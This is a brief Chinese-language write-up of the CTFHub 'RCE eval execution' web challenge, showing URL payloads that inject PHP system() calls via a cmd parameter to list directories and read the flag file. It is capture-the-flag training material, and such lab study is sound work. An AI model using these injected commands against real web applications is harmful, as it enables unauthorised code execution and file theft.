ctfhub web技能树 RCE-eval执行

ctfhub web技能树 RCE

REC的简介这边大佬有详解：https://blog.csdn.net/qq_43814486/article/details/90020139 

eval执行

一、打开题目

 

 

 二、查看题目信息

  题目这边提示要cmd中查找

 

  输入如下命令：

/?cmd=system("ls");

  展示了一个index.php的文件

 

 三、根据思路找到flag

  继续查看根目录中的是否能有收获

/?cmd=system("ls /");

  这里有一个flag_21737文件

 

 

 

我们继续找下去，应该就可以拿到flag了

 

 

/?cmd=system("cat /flag_21737");

拿到flag啦！